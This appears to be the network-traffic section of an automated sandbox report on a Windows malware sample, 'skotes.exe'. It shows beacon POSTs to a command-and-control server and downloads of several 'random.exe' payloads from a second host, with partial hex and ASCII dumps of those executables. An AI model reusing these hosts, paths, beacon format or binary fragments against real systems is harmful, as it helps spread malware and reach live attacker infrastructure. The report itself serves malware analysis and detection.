                                                                                                                                                                                                                                                            Data Ascii: iBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^]U];WBu!UVWdBW09Bu>u&}>td,dBWBW0:B_
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.688019991 CET1236INData Raw: ec 56 6a 00 6a 00 e8 93 9b 00 00 8b 75 08 85 c0 59 59 b9 53 03 42 00 0f 45 c8 51 8d 4e 24 e8 41 00 00 00 8b 45 0c 85 c0 74 0a 50 6a 00 e8 6c 9b 00 00 59 59 85 c0 b9 88 0e 42 00 0f 45 c8 51 8d 4e 2c e8 1d 00 00 00 5e 5d c3 55 8b ec 8b 45 08 83 78
                                                                                                                                                                                                                                                            Data Ascii: VjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*?VtF>u+FVYtVWPH^_[]VV(A?~YtvKYfA^UQj cEY


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            5192.168.2.449792185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.720729113 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019664001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.061853886 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:24 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.44979331.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.210086107 CET59OUTGET /files/karl/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516444921 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:26 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 22016
                                                                                                                                                                                                                                                            Last-Modified: Thu, 19 Dec 2024 14:25:14 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67642cca-5600"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf7"0Lj @ `<jOi8 H.textJ L `.rsrcN@@.relocT@BpjH(7208s/(} }!}| (+| (*0P~,Brp(rp((rp(((o(*08s2(}(})}'|((+|((*0Hs/+~~ioX-rp(+*0rp( o!+*0rp( o!+
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516458035 CET224INData Raw: 00 06 2a 00 00 13 30 03 00 32 00 00 00 06 00 00 11 00 02 72 10 01 00 70 72 18 01 00 70 28 22 00 00 0a 6f 23 00 00 0a 0a 06 06 28 03 00 00 2b 28 04 00 00 2b 73 26 00 00 0a 28 27 00 00 0a 0b 2b 00 07 2a 00 00 1b 30 04 00 ad 00 00 00 07 00 00 11 00
                                                                                                                                                                                                                                                            Data Ascii: *02rprp("o#(+(+s&('+*0s(rp( (+~%-&~s*%(+(+o-+@(.o/,%o0Xo1+o1(2
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516469002 CET1236INData Raw: 00 00 0a 2d b7 de 0f 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a 00 dc 06 13 07 2b 00 11 07 2a 00 00 00 01 10 00 00 02 00 49 00 4d 96 00 0f 00 00 00 00 13 30 03 00 65 00 00 00 08 00 00 11 00 02 72 f4 00 00 70 28 20 00 00 0a 28 05 00 00 2b 7e 0a 00 00
                                                                                                                                                                                                                                                            Data Ascii: -o3+*IM0erp( (+~%-&~s*%(+(+~%-&~ s4%(++*0urpr&po#+=o6(+,X+
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516669989 CET1236INData Raw: 0b 07 06 fe 06 29 00 00 06 73 4f 00 00 0a 28 0c 00 00 2b 28 07 00 00 2b 0c 2b 00 08 2a 13 30 02 00 1c 00 00 00 10 00 00 11 00 28 51 00 00 0a 73 52 00 00 0a 0a 06 20 20 02 00 00 6f 53 00 00 0a 0b 2b 00 07 2a 1b 30 03 00 44 00 00 00 11 00 00 11 00
                                                                                                                                                                                                                                                            Data Ascii: )sO(+(++*0(QsR oS+*0D(ToUsV%r&poW(X&r2poY((*(0Ls*s}{oZrRp(++s\(+(+
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516681910 CET448INData Raw: 7d 14 00 00 04 02 12 01 28 78 00 00 0a 7d 1a 00 00 04 02 02 7b 1a 00 00 04 7d 19 00 00 04 02 14 7d 1a 00 00 04 02 02 7b 17 00 00 04 18 18 16 20 00 10 00 00 17 73 79 00 00 0a 7d 1b 00 00 04 00 06 17 2e 02 2b 02 2b 51 00 02 7b 1b 00 00 04 02 7b 19
                                                                                                                                                                                                                                                            Data Ascii: }(x}{}}{ sy}.++Q{{{iozoo({-C%}}|(+{|!%}(p/{,{o3}}/{
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516702890 CET1236INData Raw: 00 cf 01 00 00 1a 00 00 00 1e 00 00 01 06 2a 22 02 28 6e 00 00 0a 00 2a 00 1b 30 04 00 df 01 00 00 1a 00 00 11 02 7b 1f 00 00 04 0a 06 2c 02 2b 05 38 5d 01 00 00 00 02 28 7e 00 00 0a 6f 7f 00 00 0a 7d 22 00 00 04 02 7b 22 00 00 04 16 28 01 00 00
                                                                                                                                                                                                                                                            Data Ascii: *"(n*0{,+8](~o}"{"(&(,rp((j(}#rp{#(~(&rp~(()}%rp{%oY((rp(rA
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517160892 CET1236INData Raw: 2f 12 02 7c 3c 00 00 04 fe 16 0f 00 00 1b 6f 33 00 00 0a 00 dc 02 7c 3c 00 00 04 fe 15 0f 00 00 1b 02 02 7b 29 00 00 04 28 0a 00 00 06 7d 33 00 00 04 72 ed 09 00 70 02 7b 33 00 00 04 8c 48 00 00 01 28 87 00 00 0a 28 19 00 00 0a 00 7e 05 00 00 04
                                                                                                                                                                                                                                                            Data Ascii: /|<o3|<{)(}3rp{3H((~(~({)(}4r+p|4{H((rYp|4{H(({)(}5rp{5(({)(}6rp(
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517173052 CET448INData Raw: 00 34 00 00 00 25 00 00 00 03 00 00 00 92 00 00 00 01 00 00 00 21 00 00 00 1b 00 00 00 06 00 00 00 01 00 00 00 10 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 07 00 00 00 13 00 00 00 00 00 2a 0a 01 00 00 00 00 00 06 00 81 09 ee 0d 06 00 ee 09 ee
                                                                                                                                                                                                                                                            Data Ascii: 4%!*JrdId*ddddd^<dbR+QR*YRcfsR
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517468929 CET1236INData Raw: 0e 06 00 b9 06 98 05 06 00 86 0e 98 05 06 00 cf 07 98 05 06 00 31 0b 98 05 06 00 bb 0a 98 05 06 00 4c 10 98 05 06 00 b2 0c 98 05 06 00 cb 0a 51 0a 06 00 22 03 52 0b c3 00 1d 0d 00 00 00 00 00 00 7a 05 00 00 00 00 01 00 01 00 00 00 10 00 38 0b 03
                                                                                                                                                                                                                                                            Data Ascii: 1LQ"Rz8A!ACA&A(DA*AA,.A/A'2113333Q6`
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517481089 CET224INData Raw: 00 23 00 22 2e 00 00 00 00 86 18 af 0d 06 00 24 00 2c 2e 00 00 00 00 e1 01 a6 0f 06 00 24 00 4c 30 00 00 00 00 e1 01 ad 07 26 00 24 00 4e 30 00 00 00 00 86 18 af 0d 06 00 25 00 58 30 00 00 00 00 e1 01 a6 0f 06 00 25 00 24 37 00 00 00 00 e1 01 ad
                                                                                                                                                                                                                                                            Data Ascii: #".$,.$L0&$N0%X0%$7&%%I))%
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.636172056 CET1236INData Raw: 0e 00 00 01 00 72 0b 00 00 01 00 72 0b 00 00 01 00 67 0f 00 00 01 00 72 0b 00 00 01 00 72 0b 00 00 01 00 72 0b 00 00 01 00 1b 06 00 00 01 00 72 0b 00 00 01 00 1b 06 00 00 01 00 67 0f 00 00 01 00 af 0e 00 00 01 00 bd 07 00 00 01 00 bd 07 00 00 01
                                                                                                                                                                                                                                                            Data Ascii: rrgrrrrg)19AIQYaiqy 11&YA2AI8AEq


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.449796185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.017126083 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019667001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.351469040 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:30 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.44979731.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.491219044 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803301096 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:31 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 4419072
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 20:08:15 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "6767202f-436e00"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 90 c5 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 c0 c5 00 00 04 00 00 67 02 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 79 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcg(JILu2`I@gD@ _rsrHzy r4(@.rsrcrD(@.idata rF(@ 7rH(@hvytnhukJ(@duidxfghHC@.taggant0"LC@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803478003 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803493023 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803889036 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803903103 CET896INData Raw: 50 67 94 85 96 d6 e6 52 d1 8c 88 cd 6f fd d3 3d 7b 4b d4 97 ad d4 e7 4d b0 31 67 50 07 5e af 2e 77 4f 8d 47 45 1f b8 2b 42 93 91 43 68 67 d9 d4 79 5e f6 83 97 d4 43 d2 0d 73 a8 93 18 73 d0 f2 04 6d 1f 57 ac fd f5 0c f5 d7 2d 94 0f d5 33 3d 13 74
                                                                                                                                                                                                                                                            Data Ascii: PgRo={KM1gP^.wOGE+BChgy^CssmW-3=tFgs#N5'xr6`,hj0$l"eOqqBX[k*K<Xf.S#1-+&Hm%="KS^"aKcqx+nA+
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803915024 CET1236INData Raw: 26 1f 37 7d 43 45 59 68 9f e7 d3 d1 b6 2f 48 a4 75 d6 b4 11 f3 dd 6f be ec df 1b 97 51 7b 87 b6 1b 83 3e a5 0c 04 4c 6a 29 15 77 fa 1d 57 82 22 9d 74 1f ac 2f b7 05 de 2d a6 28 bf 7b f5 43 10 23 db 71 b0 6f af 6c ee 4f 6b 96 e2 4e d4 d9 49 a4 27
                                                                                                                                                                                                                                                            Data Ascii: &7}CEYh/HuoQ{>Lj)wW"t/-({C#qolOkNI'x# }D|#AfSgy=r^<6I_%L>NPs>Xu|*oH8'77nHSE-A1&IQ7xeK!X;l"$u!LM'z|
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803924084 CET224INData Raw: a2 64 ec c2 4b d8 2c cd 13 6a 7e c5 26 b5 ff 06 c2 da 44 35 32 d4 1d 9b 2c f5 1f 4d 2a 2a b7 a1 3b 17 6c f2 0f bf 87 13 34 97 f1 ce 8a e7 04 d7 64 42 37 8f f1 b5 c4 1c d2 1b b6 c7 6c 71 7b e0 77 8f 05 8b d4 55 92 97 a0 3b 63 79 b2 03 1d 1b 16 5c
                                                                                                                                                                                                                                                            Data Ascii: dK,j~&D52,M**;l4dB7lq{wU;cy\;~+Hz$D{"Gq3)V4n0]<kWh2aLNz|sNj%n]n*\bBto,n{wO3Z7uMaX'
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804619074 CET1236INData Raw: 26 ae 06 11 e8 ef 07 fb d0 0b 96 af 49 e3 90 e8 ec 64 50 c3 11 5a f4 40 ec c2 2b 1f f1 3f e6 67 b6 1b b8 b1 ed 1d c8 15 39 cb 9e 26 5f d8 c8 8e 10 aa e9 e4 d7 6b 50 b7 56 1b 9f 83 ee 77 b4 a1 d3 37 a5 05 ce ed 6c 14 59 f3 73 45 30 13 40 38 50 53
                                                                                                                                                                                                                                                            Data Ascii: &IdPZ@+?g9&_kPVw7lYsE0@8PS[N{DN+UoIm1a,D5mU4h,o0]*,kB/`*)#89L_0j9't4*WP4(en2&|"6p=3ZPm5]@g%F3G
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804632902 CET1236INData Raw: 5f d0 ba 2d 1b ab 6c 9c ee f0 4c 2f a5 35 28 09 5d 4b 02 f3 1d 8b 86 61 fb e0 87 76 d7 c3 4c 31 67 67 ca 5b 92 e3 4b b1 c6 91 93 d7 5b 46 ca 61 6b 97 91 e0 2d bf 74 a5 c7 5c e9 34 e7 d4 00 69 c5 0b 1b e3 b9 f8 a5 80 66 29 ac bc 3f 59 48 aa 2f 58
                                                                                                                                                                                                                                                            Data Ascii: _-lL/5(]KavL1gg[K[Fak-t\4if)?YH/Xl.xc6OLz%)#A#SY0R<XKN}%Ucg]2p'itAc|'-jI8!8yk\Hw%-`%cV,l\
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804646015 CET1236INData Raw: 45 3d ac 8c 43 c0 39 38 a7 c7 f0 2d 23 28 8c 23 c4 57 fb ab 75 f3 ec d1 93 f1 0d c5 56 d4 7e 09 0f 8b df 26 ce fc e7 8b 1a 17 3c f4 b1 68 75 93 88 e5 94 e5 44 83 9e 6f 6b b3 1d 1a 20 fb 68 aa c8 4a af 1b ff 75 98 8a 6d a0 06 53 7f 95 f6 61 63 8a
                                                                                                                                                                                                                                                            Data Ascii: E=C98-#(#WuV~&<huDok hJumSac]~^mGj;~IFxK'^X5%Re&x#&DG-oac= x4CvLM>%`d1!\$ole$LiEr4THl?tTXZ
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.922967911 CET1236INData Raw: a6 0b 64 70 7f e2 cd 0b 61 5c 2a ac 8b c1 68 90 4b 56 0e ea 64 2c 0b 49 eb 13 e0 c8 a9 4b 23 25 f3 cd bc 1c 85 5a 01 91 14 17 1b 16 6b 53 23 f0 24 36 c2 46 14 35 a6 83 b5 9f dc c7 8f 11 b8 9c bc fb 33 27 f6 f5 43 1d 8e 52 6f d1 80 5a 49 3f f7 19
                                                                                                                                                                                                                                                            Data Ascii: dpa\*hKVd,IK#%ZkS#$6F53'CRoZI?zW6L(tFwHCM?&Do+w!Q d[Zg2L0V:-<T:`v'I)oSOf#ZR`Hc3)MK\.@G']?zW


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.449800185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:41.410075903 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019668001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.729342937 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            10192.168.2.44980431.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:42.855609894 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.181921959 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:43 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 1947648
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 20:51:12 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672a40-1db800"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 10 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 86 00 00 04 00 00 7c a8 1e 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$inG@ZRZCZUZ\ZBZGRichPEL,e@@@|[Ao@ @N@.rsrc@p^@.idata A@ )A@uqowvfqu@k@prbaxlvy@.taggant0"@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182060957 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182274103 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182435989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182449102 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182931900 CET1236INData Raw: c5 b5 94 06 2c a4 64 36 8e 29 54 b4 3b 73 16 ba 1f eb 55 67 d1 9c 45 46 80 ff 12 48 81 3b 2f ef 31 ca 58 d5 0e 31 e1 57 fb ec 54 bc 05 a5 65 70 0e 59 52 17 c9 c3 88 f3 53 21 e6 2a 30 ff 08 7b 55 f4 15 7f 47 ac 7e 84 65 35 0f 07 35 a7 4c 0c 4c 57
                                                                                                                                                                                                                                                            Data Ascii: ,d6)T;sUgEFH;/1X1WTepYRS!*0{UG~e55LLW'T>4&S(6e$Tw,rlRj*{f1`.Vd7XKQ9,j!8ZY)@J sj~|h.(jvtWU|5H~)N);CT.h~ -!nJl<xyIu5Pm
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:44.182944059 CET1236INData Raw: 0e 87 7c 9e a7 9d 1c 2c 39 97 48 15 ed eb 96 05 73 83 30 70 57 91 3c 98 b5 97 52 6d 62 e4 44 d4 69 19 36 2a 6a 84 38 44 6e 51 6a 46 34 a1 51 68 ed d9 25 db 4d a8 43 6f ad 8c a2 63 b8 5f 8c 8e ab fb 7b 9a 2b 16 23 cf 1e e2 c6 57 7c a6 0c 97 6f 49
